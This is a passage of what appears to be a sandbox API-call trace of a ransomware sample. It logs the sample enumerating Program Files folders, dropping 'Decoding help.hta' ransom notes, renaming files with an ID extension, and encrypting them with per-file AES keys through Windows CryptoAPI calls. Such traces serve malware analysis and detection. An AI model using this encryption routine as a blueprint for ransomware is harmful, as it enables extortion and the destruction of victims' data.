DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.548] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.548] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="xmlrw.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" [0044.548] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" [0044.548] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.548] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0044.549] CreateFileMappingA (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0044.549] CryptAcquireContextA (in: phProv=0x1c81fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c81fcec*=0x3448f18) returned 1 [0044.550] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x1c81fce8 | out: phKey=0x1c81fce8*=0x5e30f0) returned 1 [0044.550] CryptExportKey (in: hKey=0x5e30f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1c81fbe4, pdwDataLen=0x1c81fce4 | out: pbData=0x1c81fbe4*, pdwDataLen=0x1c81fce4*=0x2c) returned 1 [0044.550] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44e00) returned 0xc1d0000 [0044.659] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c81fbe4*, pdwDataLen=0x1c81fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1c81fbe4*, pdwDataLen=0x1c81fcf8*=0x100) returned 1 [0044.659] CryptEncrypt (in: hKey=0x5e30f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xc1d0000, pdwDataLen=0x1c81fce4*=0x44e00, dwBufLen=0x44e00 | out: pbData=0xc1d0000*, pdwDataLen=0x1c81fce4*=0x44e00) returned 1 [0045.663] UnmapViewOfFile (lpBaseAddress=0xc1d0000) returned 1 [0045.886] CloseHandle (hObject=0x318) returned 1 [0045.886] CryptDestroyKey (hKey=0x5e30f0) returned 1 [0045.886] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0045.886] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.886] WriteFile (in: hFile=0x450, lpBuffer=0x1c81fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1c81fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1c81fbe4*, lpNumberOfBytesWritten=0x1c81fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.887] WriteFile (in: hFile=0x450, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1c81fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1c81fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.887] CloseHandle (hObject=0x450) returned 1 [0045.891] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.891] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x30a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 1 [0045.891] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0045.891] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0045.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0045.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0045.891] lstrcmpiW (lpString1="Decoding help.hta", lpString2="xmlrwbin.dll") returned -1 [0045.891] lstrlenW (lpString="xmlrwbin.dll") returned 12 [0045.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0045.891] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0045.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="xmlrwbin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" [0045.891] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" [0045.891] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0045.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0045.892] CreateFileMappingA (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0045.892] CryptAcquireContextA (in: phProv=0x1c81fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c81fcec*=0x3448f18) returned 1 [0045.893] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x1c81fce8 | out: phKey=0x1c81fce8*=0x5e3130) returned 1 [0045.893] CryptExportKey (in: hKey=0x5e3130, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1c81fbe4, pdwDataLen=0x1c81fce4 | out: pbData=0x1c81fbe4*, pdwDataLen=0x1c81fce4*=0x2c) returned 1 [0045.893] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x30a00) returned 0x2f90000 [0045.988] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c81fbe4*, pdwDataLen=0x1c81fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1c81fbe4*, pdwDataLen=0x1c81fcf8*=0x100) returned 1 [0045.988] CryptEncrypt (in: hKey=0x5e3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f90000, pdwDataLen=0x1c81fce4*=0x30a00, dwBufLen=0x30a00 | out: pbData=0x2f90000*, pdwDataLen=0x1c81fce4*=0x30a00) returned 1 [0046.381] UnmapViewOfFile (lpBaseAddress=0x2f90000) returned 1 [0046.384] CloseHandle (hObject=0x318) returned 1 [0046.384] CryptDestroyKey (hKey=0x5e3130) returned 1 [0046.384] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0046.384] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.384] WriteFile (in: hFile=0x450, lpBuffer=0x1c81fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1c81fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1c81fbe4*, lpNumberOfBytesWritten=0x1c81fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.385] WriteFile (in: hFile=0x450, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1c81fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1c81fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.385] CloseHandle (hObject=0x450) returned 1 [0046.387] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.388] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x30a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 0 [0046.388] FindClose (in: hFindFile=0x5da638 | out: hFindFile=0x5da638) returned 1 Thread: id = 437 os_tid = 0xbc0 [0044.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*", lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da378 [0044.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.349] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.349] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.349] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252bcdd, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x252bcdd, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xab6cf35d, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0044.349] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.349] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.349] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0xffffffff [0044.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0044.493] WriteFile (in: hFile=0x450, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c95fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c95fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.494] CloseHandle (hObject=0x450) returned 1 [0044.494] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.494] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adojavas.inc") returned 1 [0044.494] lstrlenW (lpString="adojavas.inc") returned 12 [0044.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.494] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.494] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="adojavas.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc" [0044.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc" [0044.494] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0044.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adojavas.inc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adojavas.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.495] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2505b7e, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x2505b7e, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xab5eab23, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x3a67, dwReserved0=0x0, dwReserved1=0x0, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0044.495] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.495] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.495] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adovbs.inc") returned 1 [0044.495] lstrlenW (lpString="adovbs.inc") returned 10 [0044.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.495] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="adovbs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc" [0044.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc" [0044.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0044.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adovbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adovbs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.540] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0044.540] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0044.540] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0044.541] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0044.543] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.543] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.543] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" [0044.543] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*.*" [0044.543] GlobalMemoryStatus (in: lpBuffer=0x1c95fd10 | out: lpBuffer=0x1c95fd10) [0044.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x244d8180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0044.657] CloseHandle (hObject=0x354) returned 1 [0044.657] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7465328, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb7465328, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5fb141f0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0044.657] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.657] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.657] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.657] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msader15.dll") returned -1 [0044.658] lstrlenW (lpString="msader15.dll") returned 12 [0044.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msader15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" [0044.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" [0044.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.658] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b80ab9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99b80ab9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99bccd79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, 